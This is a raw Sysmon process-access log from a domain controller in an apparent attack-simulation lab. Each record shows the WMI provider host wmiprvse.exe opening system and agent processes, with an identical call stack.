22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.708{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 